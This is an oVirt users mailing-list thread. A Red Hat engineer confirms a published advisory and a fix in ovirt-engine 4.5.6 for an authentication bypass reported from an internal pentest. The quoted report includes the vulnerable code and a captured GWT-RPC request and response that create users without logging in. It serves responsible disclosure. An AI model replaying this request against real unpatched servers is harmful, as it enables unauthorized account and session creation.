Hi, thanks for reporting. An advisory has been published: https://github.com/oVirt/ovirt-engine/security/advisories/GHSA-5p2q-85hp-rvxg and the fix has been released in ovirt-engine-4.5.6: https://github.com/oVirt/ovirt-engine/releases/tag/ovirt-engine-4.5.6 Builds are on their way to the mirrors.
Il giorno lun 15 gen 2024 alle ore 10:09 Jirka Simon <ji...@vesim.cz> ha scritto: > Hello ovirt comunity. > > We had an internal pentest here and one finding is > > *Ovirt-engine authentication bypass.* > > Ovirt-engine, as deployed on ovirtm.XXX.XXX.cz, contains an > authentication bypass. It is > > possible to directly call the CreateUserSessionCommand using runAction > exposed by /ovirt- > engine/webadmin/GenericApiGWTService. > > *This action explicitly enables everyone to call it:* > ``` > > > > > * @Override protected boolean isUserAuthorizedToRunAction() { return > true; } *``` > > The behavior of this call differs based on the > ENGINE_SSO_ENABLE_EXTERNAL_SSO configuration > option: > > ``` > > > > > > *boolean externalSsoEnabled = > EngineLocalConfig.getInstance().getBoolean("ENGINE_SSO_ENABLE_EXTERNAL_SSO"); > DbUser dbUser = externalSsoEnabled ? > dbUserDao.getByUsernameAndDomain(params.getPrincipalName(), authzName) : > dbUserDao.getByExternalId(authzName, params.getPrincipalId());* > > ``` > > If this option is enabled, usernames are used to locate users. If it's > disabled, the externalId > (which seems to be a randomly generated GUID) is used to locate users. > If the specified user exists, a session is returned for the user. If the > specified user doesn't exist, > the user is created in the system. However, the user doesn't get assigned > any group membership > or rights, therefore the session creation fails because of the missing > Login right. > The attempt to modify the users table can be seen in the SQL error message > when attempting to > use a null value for the username (as the endpoint uses GWT, the payload > is mostly unreadable): > > ``` > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > *POST /ovirt-engine/webadmin/GenericApiGWTService HTTP/1.1 Host: > ovirtm.xxx.xxx.cz <http://ovirtm.xxx.xxx.cz> 14 Final Report: Results of > penetration testing (internal, external, Wi-Fi) 21 December 2023 Cookie: > JSESSIONID=wsp3WAo63LZGHfpB__stEt4lZ7z_zZycpzIprNlT.ovirtm45; Content-Type: > text/x-gwt-rpc; charset=utf-8 X-GWT-Module-Base: > https://ovirtm.xxx.xx.cz/ovirt-engine/webadmin > <https://ovirtm.xxx.xx.cz/ovirt-engine/webadmin> X-GWT-Permutation: > D7ECB5EF5E29205D18271CC08183A28D Ovirt-Xsrf-Token: > 4D87D03B631F8506FC668AA4C3FE3F443D723A9F379FDBB8B0D6DA0668650375 > Content-Length: 869 7|0|23|https://ovirtm.xxx.xxx.cz/ovirt > <https://ovirtm.xxx.xxx.cz/ovirt>- > engine/webadmin|0D1B4DEE9D1424E18C443F1CD1C11574|org.ovirt.engine.ui.frontend.gwtservices.GenericApiGWT > Service|runAction|org.ovirt.engine.core.common.action.ActionType/2930387551|org.ovirt.engine.core.commo > n.action.ActionParametersBase/2903049429|org.ovirt.engine.core.common.action.CreateUserSessionParameter > s/2744166832|appScope|email|firstName|java.util.ArrayList/4159755760|lastName|namespace|principalId|adm > in|internal|sourceIp|ssoScope|ssoToken|org.ovirt.engine.core.common.action.ActionParametersBase$EndProc > edure/1568822488|java.util.Collections$EmptyMap/4174664486|org.ovirt.engine.core.common.businessentitie > s.VDSStatus/1938301532|org.ovirt.engine.core.compat.TransactionScopeOption/1475850853|1|2|3|4|2|5|6|5|2 > 01|7|0|8|9|10|11|0|12|13|14|0|16|17|18|19|0|5|0|0|0|0|20|1|0|11|0|0|0|0|0|0|21|0|- > 4|22|0|1|0|1|23|2|0|0|0| HTTP/1.1 200 OK Date: Fri, 15 Dec 2023 09:42:35 > GMT Server: Apache/2.4.37 (CentOS Stream) OpenSSL/1.1.1k > mod_auth_gssapi/1.6.1 Expires: Thu, 14 Dec 2023 09:42:35 GMT Cache-Control: > no-cache, no-store, must-revalidate Set-Cookie: locale=cs_CZ; path=/; > secure; HttpOnly; Max-Age=2147483647; Expires=Wed, 02-Jan-2092 12:56:42 GMT > X-XSS-PROTECTION: 1; MODE=BLOCK Pragma: no-cache X-FRAME-OPTIONS: > SAMEORIGIN Content-Disposition: attachment X-CONTENT-TYPE-OPTIONS: NOSNIFF > Content-Length: 1794 Content-Type: application/json;charset=utf-8 > Correlation-Id: 664c1c1f-9a75-4e14-94d7-aba12c5442f5 Connection: close > //OK[0,5,4,8,3,1,2,474,7,6,1,0,2,0,2,5,1,0,4,3,1,2,0,2,1,1,["org.ovirt.engine.core.common.action.Action > ReturnValue/4163585948","java.util.ArrayList/4159755760","java.lang.String/2004016611","ENGINE","","org > .ovirt.engine.core.common.errors.EngineFault/2377218566","org.ovirt.engine.core.common.errors.EngineErr > or/2640515959","ERROR: null value in column \"username\" violates not-null > constraint\n Detail: Failing row contains > (6dad5e2f-7c95-4547-8f08-6936494c91b6, firstName, lastName, internal-authz, > null, , email, , f, principalId, 2023-12-14 17:51:04.757747+01, 2023-12-15 > 10:42:35.125994+01, namespace, firstName@internal-authz).\n Where: SQL > statement \"UPDATE users\n SET department \u003D v_department,\n domain > \u003D v_domain,\n email \u003D v_email,\n name \u003D v_name,\n note > \u003D v_note,\n surname \u003D v_surname,\n username \u003D v_username,\n > external_id \u003D v_external_id,\n namespace \u003D v_namespace,\n > _update_date \u003D CURRENT_TIMESTAMP\n WHERE external_id \u003D > v_external_id\n AND domain \u003D v_domain\"\nPL/pgSQL function > updateuserimpl(character varying,character varying,character > varying,character varying,character varying,character > varying,uuid,character varying,text,character varying) line 5 at SQL > statement\nSQL statement \"SELECT UpdateUserImpl(\n v_department,\n > v_domain,\n v_email,\n v_name,\n v_note,\n v_surname,\n v_user_id,\n > v_username,\n v_external_id,\n v_namespace)\"\nPL/pgSQL function > updateuser(character varying,character varying,character varying,character > varying,character varying,character varying,uuid,character > varying,boolean,text,character varying) line 3 at PERFORM"],0,7]* > > ``` > > Fortunately, in our deplyoment the ENGINE_SSO_ENABLE_EXTERNAL_SSO > configuration was > set to false, so to create a session for the admin it would be necessary > to know the admin's user > externalId. However, as this is not the default configuration, it is > possible that a later > reinstallation could change the value. Still, it was possible to create > users in the system without > any authentication. > > > What is the best way to report this security issue? > > Thank you > > Jirka > > > _______________________________________________ > Users mailing list -- users@ovirt.org > To unsubscribe send an email to users-le...@ovirt.org > Privacy Statement: https://www.ovirt.org/privacy-policy.html > oVirt Code of Conduct: > https://www.ovirt.org/community/about/community-guidelines/ > List Archives: > https://lists.ovirt.org/archives/list/users@ovirt.org/message/HG33VD56KZZQKCJDXIAB667J4HIHH2DQ/ > -- Sandro Bonazzola MANAGER, SOFTWARE ENGINEERING Red Hat In-Vehicle Operating System Red Hat EMEA <https://www.redhat.com/> <https://www.redhat.com/> *Red Hat respects your work life balance. Therefore there is no need to answer this email out of your office hours.*
_______________________________________________ Users mailing list -- users@ovirt.org To unsubscribe send an email to users-le...@ovirt.org Privacy Statement: https://www.ovirt.org/privacy-policy.html oVirt Code of Conduct: https://www.ovirt.org/community/about/community-guidelines/ List Archives: https://lists.ovirt.org/archives/list/users@ovirt.org/message/OVIOCE6WUF4UAS2X26FPMPZC2KDVOTTS/